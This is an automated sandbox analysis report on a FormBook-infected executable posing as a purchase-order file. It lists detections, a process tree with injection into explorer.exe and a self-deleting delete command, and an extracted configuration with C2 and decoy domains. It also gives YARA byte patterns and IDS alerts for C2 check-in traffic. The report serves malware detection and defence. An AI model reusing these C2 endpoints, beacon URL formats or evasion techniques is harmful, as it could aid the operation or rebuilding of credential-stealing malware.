Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-INQUIRY-VALE-SP-2022-60.exe

Overview

General Information

Sample Name:PO-INQUIRY-VALE-SP-2022-60.exe
Analysis ID:633628
MD5:86dd400e33efa12ea4cbac3d29000e41
SHA1:d2ca57eb8122a98cd03daf63532e9717f362f808
SHA256:6ccee842a4957d3410ae6163bb96a9b7739b3ffc3032dfeeb2a3c7b273ca5656
Tags:exexloader
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • PO-INQUIRY-VALE-SP-2022-60.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe" MD5: 86DD400E33EFA12EA4CBAC3D29000E41)
    • PO-INQUIRY-VALE-SP-2022-60.exe (PID: 4240 cmdline: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe MD5: 86DD400E33EFA12EA4CBAC3D29000E41)
      • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 4604 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 3488 cmdline: /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jupiter-directory.info/j86w/"], "decoy": ["popcornpor.xyz", "expoj3.com", "lespiecesmp.com", "kinuami.net", "cecil72.com", "lingmao08.com", "peliculasa.com", "medicaleducationbangladesh.com", "consultellation.com", "theminercrypto.com", "cstingche.com", "pieprop.com", "iguaym.com", "smartveranda.com", "tarpeyceramics.com", "gsibralstar1.com", "b8ceex.com", "qctxcyagmn.com", "utg-kr.com", "funserve.club", "trustedhomebuying.com", "thebrahmaspace.com", "tsreaur.com", "carmelkp.com", "maxitechtnpasumo2.xyz", "cmby84tvd.com", "creativequickwins.com", "psn10.com", "cherejeanne.com", "interiorsbe.com", "maxmaggi.com", "the-ali.com", "austereslocpc.xyz", "sharecoin.community", "vintagekendall.com", "blackoutgenerator.com", "realestatecareeratru.com", "faithac.com", "medyumagah.xyz", "cdn-azureedge.services", "chefspiceshop.com", "dachenxuetang.com", "route112mitsubishi.com", "pzhftjt.com", "famelink.biz", "5921933.com", "maridza.art", "hwy-study.xyz", "deta-hedman.com", "danilhodoekhi.com", "shibecha.info", "germesmed.store", "dzvfk.com", "burntkeroseneblueheelers.com", "online-careers.com", "hucosii.xyz", "pointconstructionservices.com", "shantellonlineshoph.com", "matterofnature.com", "cremboo.space", "jamiebakes.net", "ww2pdf.biz", "heiboard.xyz", "pixelkoncept.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x4b75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x4621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x4c77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x4def:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x389c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa127:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xb22a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6fa9:$sqlite3step: 68 34 1C 7B E1
    • 0x70bc:$sqlite3step: 68 34 1C 7B E1
    • 0x6fd8:$sqlite3text: 68 38 2A 90 C5
    • 0x70fd:$sqlite3text: 68 38 2A 90 C5
    • 0x6feb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x7113:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x4b75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x4c77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x4def:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x389c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa127:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb22a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 32 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x4f6fb:$s1: file:///
      • 0x4f60b:$s2: {11111-22222-10009-11112}
      • 0x4f68b:$s3: {11111-22222-50001-00000}
      • 0x4ca49:$s4: get_Module
      • 0x4ce8f:$s5: Reverse
      • 0x4ef3a:$s6: BlockCopy
      • 0x4ed7e:$s7: ReadByte
      • 0x4f70d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      0.3.PO-INQUIRY-VALE-SP-2022-60.exe.43bf8b0.1.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
      • 0x514fb:$s1: file:///
      • 0xd6f1b:$s1: file:///
      • 0x5140b:$s2: {11111-22222-10009-11112}
      • 0xd6e2b:$s2: {11111-22222-10009-11112}
      • 0x5148b:$s3: {11111-22222-50001-00000}
      • 0xd6eab:$s3: {11111-22222-50001-00000}
      • 0x4e849:$s4: get_Module
      • 0xd4269:$s4: get_Module
      • 0x4ec8f:$s5: Reverse
      • 0xd46af:$s5: Reverse
      • 0x50d3a:$s6: BlockCopy
      • 0xd675a:$s6: BlockCopy
      • 0x50b7e:$s7: ReadByte
      • 0xd659e:$s7: ReadByte
      • 0x5150d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      • 0xd6f2d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
      4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8a48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8de2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14b75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14c77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14def:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x97ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1389c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa562:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a127:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b22a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16fa9:$sqlite3step: 68 34 1C 7B E1
        • 0x170bc:$sqlite3step: 68 34 1C 7B E1
        • 0x16fd8:$sqlite3text: 68 38 2A 90 C5
        • 0x170fd:$sqlite3text: 68 38 2A 90 C5
        • 0x16feb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17113:$sqlite3blob: 68 53 D8 7F 8C
        Click to see the 25 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.537.97.135.18849790802031449 05/25/22-00:37:20.692347
        SID:2031449
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5217.160.0.20649817802031412 05/25/22-00:39:41.286145
        SID:2031412
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5217.160.0.20649817802031453 05/25/22-00:39:41.286145
        SID:2031453
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5156.226.250.15049796802031453 05/25/22-00:37:47.119066
        SID:2031453
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5156.226.250.15049796802031412 05/25/22-00:37:47.119066
        SID:2031412
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5198.54.117.21749813802031412 05/25/22-00:39:25.738101
        SID:2031412
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5198.54.117.21749813802031453 05/25/22-00:39:25.738101
        SID:2031453
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5172.67.219.1949815802031453 05/25/22-00:39:30.985747
        SID:2031453
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5209.141.38.7149797802031449 05/25/22-00:37:52.815294
        SID:2031449
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5165.231.150.7549795802031449 05/25/22-00:37:41.464118
        SID:2031449
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5172.67.219.1949815802031412 05/25/22-00:39:30.985747
        SID:2031412
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5104.21.27.13249811802031449 05/25/22-00:39:20.297081
        SID:2031449
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.538.143.25.23249805802031412 05/25/22-00:38:29.606349
        SID:2031412
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.538.143.25.23249805802031453 05/25/22-00:38:29.606349
        SID:2031453
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5104.21.27.13249811802031453 05/25/22-00:39:20.297081
        SID:2031453
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5165.231.150.7549795802031453 05/25/22-00:37:41.464118
        SID:2031453
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5156.226.250.15049796802031449 05/25/22-00:37:47.119066
        SID:2031449
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5209.141.38.7149797802031412 05/25/22-00:37:52.815294
        SID:2031412
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5209.141.38.7149797802031453 05/25/22-00:37:52.815294
        SID:2031453
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5172.67.219.1949815802031449 05/25/22-00:39:30.985747
        SID:2031449
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5217.160.0.20649817802031449 05/25/22-00:39:41.286145
        SID:2031449
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.537.97.135.18849790802031453 05/25/22-00:37:20.692347
        SID:2031453
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5104.21.27.13249811802031412 05/25/22-00:39:20.297081
        SID:2031412
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.537.97.135.18849790802031412 05/25/22-00:37:20.692347
        SID:2031412
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.538.143.25.23249805802031449 05/25/22-00:38:29.606349
        SID:2031449
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5165.231.150.7549795802031412 05/25/22-00:37:41.464118
        SID:2031412
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.5198.54.117.21749813802031449 05/25/22-00:39:25.738101
        SID:2031449
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.jupiter-directory.info/j86w/"], "decoy": ["popcornpor.xyz", "expoj3.com", "lespiecesmp.com", "kinuami.net", "cecil72.com", "lingmao08.com", "peliculasa.com", "medicaleducationbangladesh.com", "consultellation.com", "theminercrypto.com", "cstingche.com", "pieprop.com", "iguaym.com", "smartveranda.com", "tarpeyceramics.com", "gsibralstar1.com", "b8ceex.com", "qctxcyagmn.com", "utg-kr.com", "funserve.club", "trustedhomebuying.com", "thebrahmaspace.com", "tsreaur.com", "carmelkp.com", "maxitechtnpasumo2.xyz", "cmby84tvd.com", "creativequickwins.com", "psn10.com", "cherejeanne.com", "interiorsbe.com", "maxmaggi.com", "the-ali.com", "austereslocpc.xyz", "sharecoin.community", "vintagekendall.com", "blackoutgenerator.com", "realestatecareeratru.com", "faithac.com", "medyumagah.xyz", "cdn-azureedge.services", "chefspiceshop.com", "dachenxuetang.com", "route112mitsubishi.com", "pzhftjt.com", "famelink.biz", "5921933.com", "maridza.art", "hwy-study.xyz", "deta-hedman.com", "danilhodoekhi.com", "shibecha.info", "germesmed.store", "dzvfk.com", "burntkeroseneblueheelers.com", "online-careers.com", "hucosii.xyz", "pointconstructionservices.com", "shantellonlineshoph.com", "matterofnature.com", "cremboo.space", "jamiebakes.net", "ww2pdf.biz", "heiboard.xyz", "pixelkoncept.com"]}
        Multi AV Scanner detection for submitted file
        Source: PO-INQUIRY-VALE-SP-2022-60.exeReversingLabs: Detection: 17%
        Yara detected FormBook
        Source: Yara matchFile source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.PO-INQUIRY-VALE-SP-2022-60.exe.4357750.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000005.00000000.507488941.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000000.525854606.000000000AD0C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.951826369.0000000000440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.465617250.0000000004357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.457883967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544793668.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.952107774.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.952045146.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.458581449.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.544757949.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Antivirus detection for URL or domain
        Source: http://www.shantellonlineshoph.com/j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfTAvira URL Cloud: Label: malware
        Source: http://www.lingmao08.com/j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuhAvira URL Cloud: Label: phishing
        Source: www.jupiter-directory.info/j86w/Avira URL Cloud: Label: malware
        Source: http://www.popcornpor.xyz/j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXmAvira URL Cloud: Label: phishing
        Source: http://www.burntkeroseneblueheelers.com/j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuhAvira URL Cloud: Label: malware
        Source: http://www.jupiter-directory.info/j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfTAvira URL Cloud: Label: malware
        Source: http://www.popcornpor.xyz/j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfTAvira URL Cloud: Label: phishing
        Machine Learning detection for sample
        Source: PO-INQUIRY-VALE-SP-2022-60.exeJoe Sandbox ML: detected
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 4.2.PO-INQUIRY-VALE-SP-2022-60.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 4.0.PO-INQUIRY-VALE-SP-2022-60.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: PO-INQUIRY-VALE-SP-2022-60.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: PO-INQUIRY-VALE-SP-2022-60.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459474350.0000000001155000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.544991181.0000000001490000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.461497809.00000000012F9000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.544996697.0000000004281000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.546871204.0000000004418000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.459474350.0000000001155000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.544991181.0000000001490000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.545505707.00000000015AF000.00000040.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000003.461497809.00000000012F9000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000003.544996697.0000000004281000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.546871204.0000000004418000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546642645.0000000001960000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000004.00000002.546642645.0000000001960000.00000040.10000000.00040000.00000000.sdmp
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4x nop then pop edi4_2_00415B3E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi10_2_025C5B3E

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 209.141.38.71 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.iguaym.com
        Source: C:\Windows\explorer.exeDomain query: www.jupiter-directory.info
        Source: C:\Windows\explorer.exeDomain query: www.jamiebakes.net
        Source: C:\Windows\explorer.exeDomain query: www.burntkeroseneblueheelers.com
        Source: C:\Windows\explorer.exeDomain query: www.lingmao08.com
        Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.206 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.gsibralstar1.com
        Source: C:\Windows\explorer.exeDomain query: www.popcornpor.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.219.19 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.route112mitsubishi.com
        Source: C:\Windows\explorer.exeNetwork Connect: 81.171.22.6 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.tsreaur.com
        Source: C:\Windows\explorer.exeNetwork Connect: 156.226.250.150 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.danilhodoekhi.com
        Source: C:\Windows\explorer.exeDomain query: www.medicaleducationbangladesh.com
        Source: C:\Windows\explorer.exeNetwork Connect: 165.231.150.75 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.heiboard.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 38.143.25.232 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.expoj3.com
        Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.shantellonlineshoph.com
        Source: C:\Windows\explorer.exeDomain query: www.funserve.club
        Source: C:\Windows\explorer.exeDomain query: www.pieprop.com
        Source: C:\Windows\explorer.exeDomain query: www.theminercrypto.com
        Source: C:\Windows\explorer.exeDomain query: www.deta-hedman.com
        Source: C:\Windows\explorer.exeNetwork Connect: 37.97.135.188 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.trustedhomebuying.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 104.16.100.51 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 104.21.27.132 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.210 80Jump to behavior
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 37.97.135.188:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 37.97.135.188:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 37.97.135.188:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 165.231.150.75:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 165.231.150.75:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 165.231.150.75:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49796 -> 156.226.250.150:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49796 -> 156.226.250.150:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49796 -> 156.226.250.150:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 209.141.38.71:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 209.141.38.71:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 209.141.38.71:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49805 -> 38.143.25.232:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49805 -> 38.143.25.232:80
